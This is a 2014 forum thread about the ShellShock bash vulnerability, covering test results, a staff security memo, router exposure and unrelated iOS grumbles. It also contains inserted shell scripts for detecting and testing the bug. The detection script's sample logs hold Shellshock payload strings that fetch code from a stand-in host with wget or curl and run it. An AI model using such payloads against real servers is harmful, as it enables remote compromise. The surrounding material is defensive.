Linux/Apple mac bug

pre65
Amstrad Tower of Power
Posts: 21400
Joined: Wed Aug 22, 2007 11:13 pm
Location: North Essex/Suffolk border.

#1 Linux/Apple mac bug

Post by pre65 »

The only thing necessary for the triumph of evil is for good men to do nothing.

Edmund Burke

G-Popz THE easy listening connoisseur. (Philip)
Cressy Snr
Amstrad Tower of Power
Posts: 10582
Joined: Wed May 30, 2007 12:25 am
Location: South Yorks.

#2 Re: Linux/Apple mac bug

Post by Cressy Snr »

Last login: Wed Sep 24 20:26:38 on console
xxxxxxxxxxxMacMini:~ steve$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
xxxxxxxxxxxxxMacMini:~ steve$
xxxxxxxxxxxxxMacMini:~ steve$

(My xs)

Oh dear :cry:

Oh well, nothing to be done except wait for the Apple security update.

No web services are running on my Mac (I hope)
Sgt. Baker started talkin’ with a Bullhorn in his hand.
jack
Thermionic Monk Status
Posts: 5504
Joined: Wed Dec 29, 2010 8:58 pm
Location: ɐılɐɹʇsnɐ oʇ ƃuıʌoɯ ƃuıɹǝpısuoɔ

#3

Post by jack »

"in the trade" we've been looking at this (aka. "ShellShock") for a few days now - all versions of Bash up to current are affected - there is no escape.

Luckily, our production sites are not exposed, but it's going to cause a world of pain out there.

The main problem is that it's far easier than HeartBleed to exploit, and also far far more flexible - HeartBleed "only" allowed you to trawl through the in-memory data of the target server and maybe you'd find some usernames and unencrypted passwords or session/private RSA keys.

The problem with ShellShock is that you can do pretty much anything you want on the target server. It's a free pass to mayhem.

Ho, hum...
Vivitur ingenio, caetera mortis erunt
pre65
Amstrad Tower of Power
Posts: 21400
Joined: Wed Aug 22, 2007 11:13 pm
Location: North Essex/Suffolk border.

#4

Post by pre65 »

Steve, I hope your Apple update is less painful than the recent I phone fiasco. :wink:
Cressy Snr
Amstrad Tower of Power
Posts: 10582
Joined: Wed May 30, 2007 12:25 am
Location: South Yorks.

#5

Post by Cressy Snr »

pre65 wrote: Steve, I hope your Apple update is less painful than the recent I phone fiasco. :wink:
I don't own an iPhone; will never own an iPhone.
I very reluctantly own a mobile phone, but nobody rings me, because I never give out my number.
I don't want to be contactable.
Cellphones....worst bloody thing ever to be invented.
Some stupid cow walked straight into me this morning whilst I was walking the dog. She was texting of course, not looking where she was going and the kid she had in tow was playing a game on a tablet and he wasn't looking where he was going either.
I couldn't give a fook about iPhones :lol:
jack
Thermionic Monk Status
Posts: 5504
Joined: Wed Dec 29, 2010 8:58 pm
Location: ɐılɐɹʇsnɐ oʇ ƃuıʌoɯ ƃuıɹǝpısuoɔ

#6

Post by jack »

This is what I sent to all our staff yesterday:
Introduction

Many of you will have read about this in the press. For those that haven’t, the simple summary is that the Bash shell that is used to execute CGI requests on most of the world’s web servers has had a huge and easily-exploitable hole in it for 20 years. As everyone uses the same version of the Unix toolchain, everyone uses the same “Bash” and thus all Unix-based systems are equally vulnerable.

It’s rated as being far worse in real terms than the “HeartBleed” SSL issue, in that rather than “just” being able to trawl the memory space of the remote web server for username/password combos or private RSA keys, you can basically do what you like - you can execute arbitrary commands in the context of the remote shell – it’s really easy/trivial to exploit this bug – examples in the link below.

RedHat have probably the most concise description of this issue – see https://securityblog.redhat.com/2014/09 ... on-attack/

Note that the fix that was originally posted was incomplete – a new fix is yet to be delivered.

How does this affect me?

Possibly a lot, in that sites that you access and which have your data stored on them may well be completely open to attack. If you run your own web sites (nearly all run some variant of Linux), you should replace your Bash as soon as an approved fix is available.

However, there is nothing you, as a client browser, can do to lessen your chances of being indirectly affected by such an attack – it’s server-side only and therefore up to each Unix-based website that uses Bash-based CGI scripting to implement the fixes ASAP, or to simply disable Bash CGI until the fix is made.

Nick
EDIT: This is being actively used in the wild already - a botnet was discovered within hours of the announcement - cunningly, it uses wget or curl to download the botnet precursor, does a chmod 777, then executes the downloaded code to subvert the host and add it to the botnet.
Last edited by jack on Fri Sep 26, 2014 10:59 am, edited 1 time in total.
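The memo above describes the mechanism (a CGI server copies request headers into environment variables, which is how a "() { :;}; ..." string reaches bash) and the dropper pattern seen in the wild (wget or curl, chmod, execute). The following is an added example, not code from the thread or from any of the posters: it shows the header-to-variable mapping a CGI server performs and then scans constructed access-log lines for the probe signature and for the fetch-and-run payload. The log lines, hosts (example.invalid) and addresses are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread). The CGI interface passes a request
# header such as "User-Agent: X" to the script as HTTP_USER_AGENT=X, so any
# header is a route into bash's environment-variable function import.
header_to_env() {
    printf 'HTTP_%s\n' "$(printf '%s' "$1" | tr 'a-z-' 'A-Z_')"
}

# Constructed sample lines in combined log format: IP, timestamp, request,
# status, size, Referer, User-Agent. Hosts and addresses are hypothetical.
SAMPLE_LOG='203.0.113.7 - - [25/Sep/2014:10:01:02 +0100] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://example.invalid/x -O /tmp/x; chmod 777 /tmp/x; /tmp/x\""
198.51.100.4 - - [25/Sep/2014:10:01:05 +0100] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [25/Sep/2014:10:02:11 +0100] "GET /cgi-bin/test.cgi HTTP/1.1" 200 64 "() { :;}; echo vulnerable" "curl/7.37.0"
192.0.2.55 - - [25/Sep/2014:10:03:40 +0100] "GET /about HTTP/1.1" 404 0 "-" "() { foo; }; /usr/bin/curl -s http://example.invalid/b | sh"'

# Every line carrying a function-definition prefix in any header field.
# Bash only imported values that began with exactly "() {", so that literal
# string is the signature to look for; the Referer is as usable as User-Agent.
shellshock_probes() {
    printf '%s\n' "$SAMPLE_LOG" | grep -F '() {'
}

# Probes whose payload fetches and runs something: the botnet-precursor
# pattern (wget/curl followed by chmod, or piped straight into sh).
shellshock_droppers() {
    shellshock_probes | grep -E 'wget|curl' | grep -E 'chmod|[|] *sh'
}

# Distinct source addresses of the probes, for blocking or follow-up.
shellshock_probe_ips() {
    shellshock_probes | awk '{print $1}' | sort -u
}

count_probes()   { shellshock_probes   | wc -l | tr -d ' '; }
count_droppers() { shellshock_droppers | wc -l | tr -d ' '; }

echo "User-Agent arrives in CGI as: $(header_to_env User-Agent)"
echo "probe lines: $(count_probes), dropper lines: $(count_droppers)"
shellshock_probe_ips
```

Against a real server the same search is `grep -F '() {' /var/log/apache2/access.log` (or whatever the access log is); note that the third sample line carries the probe in the Referer field while its User-Agent is an ordinary curl string, which is why the search runs over the whole line rather than one field.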
Dave the bass
Amstrad Tower of Power
Posts: 12276
Joined: Tue May 22, 2007 4:36 pm
Location: NW Kent, Darn Sarf innit.

#7

Post by Dave the bass »

nickds1 wrote: ... cunningly, it uses wget or curl to download the botnet precursor, does a chmod 777, then executes the downloaded code to subvert the host and add it to the botnet.
I thought it might.
"The fat bourgeois and his doppelganger"
The Stratmangler
Shed dweller
Posts: 2893
Joined: Fri Aug 24, 2007 1:50 pm
Location: Rossendale, Lancashire

#8

Post by The Stratmangler »

My son's school pushed through an iPad scheme for teaching in the classroom.
They even managed to get the support of the majority of parents, who actually pay a not inconsiderable amount of money towards the scheme.

I refused to participate.
The business world doesn't generally use Apple product, so there's little software wise to help my son.
There is plenty of IT equipment and software here at home for him to produce work for school.

With this iOS8 update fiasco there are huge numbers of iPads now not doing what they're supposed to be doing.
Huge amounts of stored files containing the work of students have disappeared because they were stored on the iPads.

I'm not laughing, because it isn't funny, but my son has been relieved of the stress of having large amounts of his work lost, which is something I am grateful for.
My son's work is largely on paper.

I wonder how long it's going to be before the school drops the iPad as a teaching tool?
Chris :happy3:
shane
Social outcast
Posts: 3405
Joined: Sun Sep 16, 2007 12:09 pm
Location: Kept in a cool dry place.

#9

Post by shane »

One of the less well noted effects of iOS8 is that, if two devices are registered using the same Apple ID, a phone call to one can make either or both of them ring. One customer with two iP6s and two iP5s found that all incoming calls made all four ring. One of my colleagues was bemused to discover that all calls coming into his iPhone were being diverted to his iPad. It's quite difficult to answer an iPad when it rings...
The world looks so different after learning science. For example, trees are made of air, primarily. When they are burned, they go back to air, and in their flaming heat is released the flaming heat of the Sun which was bound in to convert air into tree.
Andrew
Eternally single
Posts: 4206
Joined: Thu May 24, 2007 2:18 pm

#10

Post by Andrew »

My Fedora box was patched this morning, the hack's 'proof of concept' shown by Steve (and widely available elsewhere) now seems to be caught correctly and I get "ignoring function definition attempt" and "error importing function definition for 'xxxx'".

Someone asked me if the Linksys router family is vulnerable, as you may know many of these boxes run a variant of Linux and so the question is very pertinent.

Thankfully, as far as I understand it, most routers use a cut down version of a shell named 'ash' which is part of busybox and I can't seem to make mine do anything worrying with spurious function definitions when I get a shell up via remote login.

If you are concerned, it might be worthwhile checking your own router/NAS etc (many run Linux) if you can and know how, especially if it can be accessed, like a router could, from the wider Internet.

Andrew
Analogue, the lost world that lies between 0 and 1.
jack
Thermionic Monk Status
Posts: 5504
Joined: Wed Dec 29, 2010 8:58 pm
Location: ɐılɐɹʇsnɐ oʇ ƃuıʌoɯ ƃuıɹǝpısuoɔ

#11

Post by jack »

Andrew wrote: If you are concerned, it might be worthwhile checking your own router/NAS etc (many run Linux) if you can and know how, especially if it can be accessed, like a router could, from the wider Internet.
"ash" and "bash" are not related - they have different origins and different authors - systems based on "ash" should be safe (from this bug, at least!).
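Pulling together the one-liner Steve ran in post #2, the "ignoring function definition attempt" outcome Andrew reports in post #10 and the ash-versus-bash point in post #11, here is an added example that is not code from the thread or from any of the posters. It wraps the test so the result comes back as a word rather than being read off the screen, adds the follow-up check for the incomplete first fix that the memo in post #6 mentions, and checks which shell "sh" really is. BASH_BIN is an assumed environment variable naming the binary to test; it defaults to whatever "bash" is on PATH. The CVE numbers are the public identifiers for the two bugs and are not from the thread.

```shell
#!/bin/sh
# Added example (not from the thread): classify a bash binary against the two
# ShellShock parser bugs and report what "sh" resolves to.

# CVE-2014-6271: a value of the form "() { ...}; cmd" imported from the
# environment had its trailing "cmd" executed while bash parsed the definition.
shellshock_6271() {
    bash_bin="${BASH_BIN:-bash}"      # assumed variable; defaults to PATH bash
    command -v "$bash_bin" >/dev/null 2>&1 || { echo missing; return 0; }
    out="$(env x='() { :;}; echo vulnerable' "$bash_bin" -c 'echo this is a test' 2>&1 || true)"
    case "$out" in
        *vulnerable*) echo vulnerable ;;   # trailing command ran: unpatched
        *)            echo patched ;;      # ignored, or warned and refused
    esac
}

# CVE-2014-7169: with only the first fix applied, the parser still mishandled
# "() { (a)=>\" so that the next word of the command became a redirection
# target: "echo date" turned into ">echo date", leaving a file named "echo"
# in the working directory. Run it in a scratch directory and look for that file.
shellshock_7169() {
    bash_bin="${BASH_BIN:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || { echo missing; return 0; }
    dir="$(mktemp -d)"
    ( cd "$dir" && env X='() { (a)=>\' "$bash_bin" -c 'echo date' >/dev/null 2>&1 || true )
    if [ -e "$dir/echo" ]; then echo vulnerable; else echo patched; fi
    rm -rf "$dir"
}

# Routers and NAS boxes usually ship BusyBox ash as /bin/sh, which shares no
# code with bash. bash sets BASH_VERSION even when invoked as "sh"; ash does not,
# so an empty value means CGI scripts run through "sh" never touch bash at all.
sh_flavour() {
    if [ -n "$(sh -c 'echo "$BASH_VERSION"' 2>/dev/null)" ]; then
        echo bash
    else
        echo not-bash
    fi
}

echo "CVE-2014-6271 (original bug):    $(shellshock_6271)"
echo "CVE-2014-7169 (incomplete fix):  $(shellshock_7169)"
echo "sh on this system is:            $(sh_flavour)"
```

To test a binary other than the one on PATH, for instance a vendor shell on a mounted firmware image, set BASH_BIN to its path; "missing" means the binary could not be found rather than that it is safe. A system whose sh reports not-bash can still be exposed if a CGI script names bash explicitly in its shebang, so the first two checks are still worth running wherever a bash binary exists.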
Neal
Shed dweller
Posts: 2300
Joined: Fri Aug 03, 2007 10:57 am
Location: From the land of the Bodgers

#12

Post by Neal »

OSX update released....
Only the Sith deal in absolutes.